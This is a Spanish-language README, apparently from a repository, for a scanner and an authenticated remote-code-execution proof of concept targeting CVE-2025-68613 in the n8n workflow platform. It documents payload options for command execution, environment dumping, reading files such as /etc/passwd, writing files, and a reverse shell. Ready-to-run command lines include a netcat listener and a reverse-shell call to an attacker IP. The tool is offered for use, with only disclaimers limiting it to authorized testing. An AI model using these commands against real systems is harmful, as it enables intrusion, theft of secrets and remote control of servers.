Exploit PoC de RCE autenticado y escáner de vulnerabilidades para CVE-2025-68613 en n8n. Admite ejecución de comandos, operaciones con archivos y payloads de shell inversa para pruebas de seguridad autorizadas.
Este repositorio proporciona scripts de escáner y PoC de explotación para la vulnerabilidad crítica CVE-2025-68613 que afecta a n8n Workflow Automation Platform.
Esta herramienta es SOLO para pruebas de seguridad AUTORIZADAS y LEGALES. Está prohibido usar esta herramienta en sistemas sin permiso del propietario.
Esta herramienta es SOLO para pruebas de seguridad AUTORIZADAS y LEGALES. El uso no autorizado es ilegal y está prohibido.
0.211.0 – 1.120.31.121.01.120.4+1.121.1+1.122.0+.
├── tot-scanner-2025-68613.py # Escáner de vulnerabilidad (sin explotación)
├── tot-exploit-2025-68613.py # PoC de RCE autenticado
├── requirements.txt
└── README.md
El escáner se utiliza para:
El escáner:
El escáner verifica los siguientes endpoints:
//rest/settings/healthz/api/v1/healthPaquetes necesarios:
Contenido del archivo requirements.txt:
requests>=2.28.0
Paquetes necesarios:
Contenido del archivo requirements.txt:
requests>=2.28.0
pip install -r requirements.txt
python3 tot-scanner-2025-68613.py -u http://target.com:5678
python3 tot-scanner-2025-68613.py -u http://target.com:5678 --json
{
"target": "http://target.com:5678",
"detected": true,
"version": "1.121.0",
"vulnerable": true,
"status": "vulnerable",
"cve": "CVE-2025-68613"
}
| Código | Significado |
|---|---|
| 0 | No vulnerable |
| 1 | Versión desconocida |
| 2 | Vulnerable |
Este exploit REQUIERE credenciales válidas de n8n
Se requiere acceso autenticado
El exploit funciona:
Set| Argumento | Requerido | Descripción |
|---|---|---|
-u / --url | ✅ | URL objetivo de n8n |
-e / --email | ✅ | Correo electrónico de la cuenta n8n |
-p / --password | ✅ | Contraseña de la cuenta n8n |
--payload | ✅ | Tipo de payload |
--command | ❌ | Comando del sistema (cmd) |
--file | ❌ | Ruta del archivo (read/write) |
--content | ❌ | Contenido del archivo (write) |
--lhost | ❌ | IP del atacante (revshell) |
--lport | ❌ | Puerto del atacante (revshell) |
--verify-ssl | ❌ | Verificar certificado SSL |
| Payload | Función |
|---|---|
info | Información del sistema |
cmd | Ejecución de comandos |
env | Volcado de entorno |
read | Leer archivo |
write | Escribir archivo |
revshell | Reverse shell |

python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload info
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload cmd --command "id"
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload read --file /etc/passwd
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload write --file /tmp/pwned.txt --content "owned"
nc -lvnp 4444
python3 tot-exploit-2025-68613.py -u http://target.com:5678 -e [email protected] -p password --payload revshell --lhost 10.10.14.5 --lport 4444
/rest/*Este proyecto se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.
El autor no se hace responsable del uso indebido.
n8n
cve
cve-2025-68613
rce
expression-injection
security
pentest
red-team
blue-team
python
Manténgase legal. Manténgase ético.